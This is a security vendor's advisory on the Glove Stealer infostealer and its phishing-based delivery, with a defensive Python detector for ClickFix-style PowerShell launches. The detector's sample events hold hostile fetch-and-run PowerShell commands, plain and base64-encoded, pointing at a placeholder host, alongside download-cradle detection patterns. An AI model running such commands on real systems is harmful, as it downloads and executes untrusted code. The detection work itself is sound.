Glove Stealer Bypasses Chrome's App-Bound Encryption: Why Default-Deny Still Wins
A new .NET infostealer defeats Chrome's cookie protection — but only after the user is tricked into running an unauthorized script. Stop the execution and the bypass never happens.
Date: November 14, 2024 · Primary Sources: Gen Digital, BleepingComputer

Executive Summary
- What: Glove Stealer is a new .NET information stealer that can bypass Chrome's App-Bound Encryption (ABE) to steal cookies and credentials, plus data from many apps and extensions.
- Who is affected: Windows users of Chromium-based browsers; data at risk includes cookies, saved credentials, crypto wallets, 2FA authenticators, password managers, and email clients.
- Severity: Medium-High — broad data theft, though distribution depends on tricking the user into running a script.
- Action required: Block the unauthorized script and stealer at execution; pair default-deny with phishing defenses and credential hygiene.
Overview
In November 2024, Gen Digital researchers detailed Glove Stealer, a .NET infostealer that targets cookies, credentials, and data from a wide range of applications and browser extensions. (Gen Digital) Its notable capability is bypassing Chrome's App-Bound Encryption (ABE), the cookie-protection mechanism introduced in Chrome 127 that hands the cookie key to a SYSTEM-level Chrome elevation service so that a process running only as the logged-in user cannot decrypt it from Local State. Glove does this by calling the browser's own COM-based IElevator interface to decrypt the key; per Gen Digital, that step needs local administrator rights, because a supporting module has to be placed in Chrome's Program Files directory first. (Gen Digital) The same bypass approach had been publicly disclosed in late October 2024. (SecurityWeek)
Critically, the bypass is not the entry point. Glove Stealer is distributed through phishing emails with an HTML attachment that shows a fake error and instructs the victim to copy a malicious script and run it — a ClickFix-style social-engineering trick — which kicks off PowerShell and the eventual infostealer infection. (Gen Digital) (BleepingComputer) It tries to exfiltrate from 280+ browser extensions and 80+ local applications, and appears to be in a relatively early stage with minimal obfuscation. (SecurityWeek)
The defensive point: the headline-grabbing ABE bypass only matters after unauthorized code runs. Prevent that, and the rest of the chain collapses — which is what White Cloud Security (WCS) Trust Lockdown does.
Threat Summary
| Field | Detail |
|---|---|
| Malware family | Glove Stealer (.NET infostealer) |
| Public report | November 14, 2024 (Gen Digital) |
| Distribution | Phishing → HTML attachment → fake error → user pastes/runs script → PowerShell → stealer |
| Notable capability | Bypasses Chrome App-Bound Encryption via the IElevator COM service (requires local admin rights on the victim machine) |
| Data targeted | Cookies, credentials, 280+ extensions, 80+ apps (wallets, 2FA, password managers, email) |
| Maturity | Early development; minimal obfuscation |
| Observed in the wild | Yes, distributed through active phishing campaigns |
Technical Analysis
How the Attack Works
Per Gen Digital, the chain runs like this: (Gen Digital)
- Phishing lure. An email carries an HTML attachment that renders a fake "content couldn't be displayed" error.
- User-run script (social engineering). The victim is told to copy a script and execute it via a terminal or Run prompt, invoking PowerShell.
- Stealer deployment. Follow-on scripts install Glove Stealer.
- Data theft + ABE bypass. The stealer harvests browser cookies/credentials — using the IElevator COM service to defeat App-Bound Encryption — plus data from many extensions and applications.
Payload and Impact
Stolen cookies and credentials enable session hijacking and account takeover; harvested wallet, 2FA, and password-manager data deepen the exposure. Because the lure relies on the user running a script, this is also a reminder that social engineering remains a primary delivery method.
Why Traditional Defenses Struggle
- User-executed scripts look like deliberate actions, not exploits.
- PowerShell is legitimate and ubiquitous, so abuse blends in.
- A new, lightly obfuscated stealer may still slip past signatures and can be rebuilt.
- The ABE bypass undermines a protection some defenders assumed was sufficient.
How White Cloud Security Trust Lockdown Stops This
WCS Trust Lockdown enforces a default-deny, Zero-Trust App Firewall: nothing executes unless it has been explicitly Approved by application, publisher/certificate, handprint, and approved parent-child relationship.
| Attack step | How WCS would help |
|---|---|
| User pastes/runs the malicious script | Parent-child execution controls help stop a browser/terminal from launching unapproved script-driven payloads |
| PowerShell-driven stages | Unapproved follow-on executables would be denied |
| Glove Stealer (.NET) runs | The unapproved stealer would be prevented from running — so no cookies/credentials are harvested and the ABE bypass never executes |
| Rebuilt binary | Handprint identity (SHA-1, SHA-256, SHA-512, MD5, CRC32, file length) means a recompiled or repacked stealer carries a handprint that was never approved, so it is denied by default no matter what a signature scanner concludes |
By denying the stealer at execution, WCS would help block the data theft before the App-Bound Encryption bypass can run, and would give administrators visibility into blocked applications. Scope, stated plainly: WCS does not stop the phishing email or a user copying a script, and it does not replace phishing-awareness training, EDR, or credential hygiene — it is the execution-control layer that holds when a user is tricked.
At White Cloud Security, we continue to track and report new hacking methods and tools, not just because of the immediate threat they pose, but because patterns of reuse often expose the playbooks of these cybercriminal groups.
Recommended Mitigations
- Deploy default-deny application control so the stealer cannot execute even if a user runs the script.
- Train users to recognize "copy and run this script" lures (ClickFix-style attacks).
- Constrain PowerShell and script hosts; restrict child-process execution from email clients and browsers.
- Rotate credentials and invalidate sessions on suspicion; enforce MFA.
- Monitor for mass browser-data access and unusual credential use.
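The attack chain above and the mitigation on constraining script hosts both come down to one observable: a script host started from the user shell, a browser or a mail client, with loader-style switches on its command line. The following Python is an added hunting example written for this page; it is not code from Gen Digital, BleepingComputer or White Cloud Security, and the event field names, the parent weights, the alert threshold and the sample events are all assumptions constructed to resemble Sysmon Event ID 1 / EDR process-creation records. Two facts it relies on are real: a command pasted into the Windows Run prompt is launched with explorer.exe as its parent, and PowerShell's -EncodedCommand argument is base64 of UTF-16LE text, so the hidden stage can be decoded and scored as well.

```python
"""Hunt for ClickFix-style script-host launches in process-creation telemetry.

Added example: scoring rules over constructed process-creation events. Field names,
weights and sample data are assumptions, not a vendor schema.
"""
import base64
import re
from typing import Dict, List, Optional

# Script hosts a pasted "fix" command typically invokes.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Parent weight (assumed): browsers and mail clients have no business spawning a script
# host (2); explorer.exe is ambiguous, since it is the parent of a Run-prompt paste but
# also of a console the user opened deliberately (1). Any other parent scores 0.
PARENT_WEIGHT = {"chrome.exe": 2, "msedge.exe": 2, "brave.exe": 2, "firefox.exe": 2,
                 "outlook.exe": 2, "thunderbird.exe": 2, "explorer.exe": 1}

# Command-line features common to pasted loaders, matched case-insensitively against the
# raw command line plus the decoded -EncodedCommand payload when one is present.
CMDLINE_INDICATORS = {
    "exec_policy_bypass": re.compile(r"-e[a-z]*\s+bypass", re.I),        # -ep / -ExecutionPolicy Bypass
    "hidden_window": re.compile(r"-w[a-z]*\s+hidden", re.I),             # -w / -WindowStyle Hidden
    "download_cradle": re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|"
        r"net\.webclient|bitsadmin|certutil)\b", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
}
ENCODED_ARG = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{20,})", re.I)      # -e / -enc / -EncodedCommand
ALERT_THRESHOLD = 2  # parent weight plus one point per command-line indicator


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent or not decodable."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def basename(path: str) -> str:
    """Lower-cased file name from a Windows (or forward-slash) path, quotes stripped."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


def evaluate(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Score one process-creation event; return a finding if it reaches ALERT_THRESHOLD."""
    image = basename(event["image"])
    if image not in SCRIPT_HOSTS:
        return None  # only script hosts are in scope for this hunt
    parent = basename(event["parent"])
    decoded = decode_encoded_command(event["cmdline"])
    text = event["cmdline"] + ("\n" + decoded if decoded else "")
    indicators = [name for name, pat in CMDLINE_INDICATORS.items() if pat.search(text)]
    if decoded:
        indicators.append("encoded_command")
    score = PARENT_WEIGHT.get(parent, 0) + len(indicators)
    if score < ALERT_THRESHOLD:
        return None
    return {"ts": event["ts"], "host": event["host"], "user": event["user"],
            "chain": f"{parent} -> {image}", "score": score,
            "indicators": indicators, "decoded_command": decoded}


def hunt(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run evaluate() over a batch of events and keep the findings."""
    return [f for f in map(evaluate, events) if f is not None]


def _enc(ps: str) -> str:
    """Encode a PowerShell string the way -EncodedCommand expects (base64 of UTF-16LE)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed sample events (not real telemetry); the URLs use the reserved .invalid TLD.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # 1: ClickFix paste into Win+R: explorer.exe is the parent, cradle and iex inline.
    {"ts": "2024-11-14T09:02:11Z", "host": "WS-17", "user": r"CORP\jdoe",
     "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": 'powershell -w hidden -ep bypass -c "iwr https://example.invalid/fix.ps1 | iex"'},
    # 2: follow-on stage launched by the first script, payload hidden behind -Enc.
    {"ts": "2024-11-14T09:02:14Z", "host": "WS-17", "user": r"CORP\jdoe",
     "parent": r"C:\Windows\System32\cmd.exe", "image": PS,
     "cmdline": "powershell.exe -NoP -NonI -W Hidden -Enc "
                + _enc("IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage2.ps1')")},
    # 3: benign scheduled inventory script: one indicator, neutral parent, stays below threshold.
    {"ts": "2024-11-14T09:05:00Z", "host": "WS-17", "user": r"NT AUTHORITY\SYSTEM",
     "parent": r"C:\Windows\System32\svchost.exe", "image": PS,
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    # 4: not a script host at all.
    {"ts": "2024-11-14T09:06:30Z", "host": "WS-17", "user": r"CORP\jdoe",
     "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
    # 5: user opened a console from the Start menu: explorer parent alone is not enough.
    {"ts": "2024-11-14T09:07:02Z", "host": "WS-17", "user": r"CORP\jdoe",
     "parent": r"C:\Windows\explorer.exe", "image": PS, "cmdline": f'"{PS}"'},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f['ts']} {f['host']} {f['user']} {f['chain']} score={f['score']} {f['indicators']}")
        if f["decoded_command"]:
            print("   decoded:", f["decoded_command"])
```

Run as a script, it flags events 1 and 2 and stays quiet on the inventory task, the Notepad launch and the hand-opened console. The weighting is deliberately simple so it can be read in one pass: a browser or mail-client parent alone is enough to alert, while an explorer.exe parent needs at least one loader switch alongside it, which is what separates a Run-prompt paste from a user opening PowerShell. Tune PARENT_WEIGHT and ALERT_THRESHOLD to your own baseline before deploying anything like this.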
Key Takeaways
- The bypass is a sideshow — the real control point is preventing the stealer from running.
- "Paste this script" is the modern lure — execution control is the backstop.
- Handprint identity denies rebuilt stealers that defeat signatures.
- Prevention complements awareness training, EDR, MFA, and credential hygiene.
References
- Gen Digital — Glove Stealer: Leveraging IElevator to Bypass App-Bound Encryption & Steal Sensitive Data (Gen Digital)
- BleepingComputer — New Glove infostealer malware bypasses Chrome's cookie encryption (BleepingComputer)
- SecurityWeek — Glove Stealer Malware Bypasses Chrome's App-Bound Encryption (SecurityWeek)